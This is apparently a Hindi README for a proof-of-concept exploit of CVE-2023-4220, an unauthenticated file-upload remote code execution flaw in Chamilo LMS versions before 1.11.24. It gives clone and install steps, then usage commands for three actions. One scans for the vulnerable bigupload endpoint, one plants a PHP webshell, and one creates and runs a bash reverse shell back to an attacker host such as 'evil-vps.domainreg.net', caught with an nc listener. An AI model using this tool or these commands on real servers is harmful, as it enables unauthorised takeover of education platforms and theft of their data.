
यह Python में लिखी गई एक स्क्रिप्ट है जो CVE-2023-4220 में वर्णित Chamilo LMS सॉफ़्टवेयर की सुरक्षा कमज़ोरी का शोषण करने की अनुमति देती है।
यह Python में लिखी गई एक स्क्रिप्ट है जो CVE-2023-4220 में वर्णित Chamilo's LMS सॉफ़्टवेयर की सुरक्षा भेद्यता के शोषण की अनुमति देती है। यह सिस्टम 1.11.24 से पहले के संस्करणों में संवेदनशील (vulnerable) है।
रिपॉजिटरी को अपनी मशीन पर क्लोन करें और pip का उपयोग करके निर्भरताएँ (dependencies) इंस्टॉल करें (इन इंस्टॉलेशन को वैश्विक इंस्टॉलेशन से अलग करने के लिए एक वातावरण बनाने हेतु virtualenv का उपयोग करने की अनुशंसा की जाती है)
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt
स्क्रिप्ट को Chamilo's रूट पथ के साथ लक्ष्य URL की आवश्यकता होती है (जैसे http://example.com/chamilo, http://example.com या http://chamilo.example.com) और एक क्रिया (action) जो निष्पादित की जानी है (उनमें से तीन उपलब्ध हैं: scan, webshell और revshell)।
यह क्रिया /main/inc/lib/javascript/bigupload/files/ एंडपॉइंट तक पहुँचने का प्रयास करके जाँच करेगी कि क्या लक्ष्य संवेदनशील (vulnerable) है।
python3 main.py -u http://example.com/chamilo -a scan

यह क्रिया संवेदनशील एंडपॉइंट में एक PHP webshell फ़ाइल बनाएगी।
python3 main.py -u http://example.com/chamilo -a webshell

यह क्रिया एक bash reverse shell फ़ाइल बनाएगी और निष्पादित करेगी। ऐसा करने के लिए, पहले पिछली क्रिया में उपयोग की गई उसी विधि का उपयोग करके एक webshell बनाई जाएगी। उसके बाद, bash फ़ाइल बनाने और निष्पादित करने के लिए कुछ कमांड चलाए जाएँगे। सुनिश्चित करें कि आप उस पोर्ट पर सुन रहे हैं जिसे आपने nc या किसी अन्य उपयोगिता से परिभाषित किया है ताकि आपको वास्तव में रिवर्स कनेक्शन मिल सके। साथ ही, होस्ट एक मान्य आंतरिक/सार्वजनिक IPv4 (जैसे 172.17.1.4 या 186.227.4.31) या वह डोमेन हो सकता है जो आपने पंजीकृत किया है (जैसे evil-vps.domainreg.net)
python3 main.py -u http://example.com/chamilo -a revshell

नोट: जल्द ही मैं Windows होस्ट के लिए एक Windows पेलोड विकल्प जोड़ूँगा
(CVE-2023-4220) Chamilo LMS Unauthenticated Big Upload File Remote Code Execution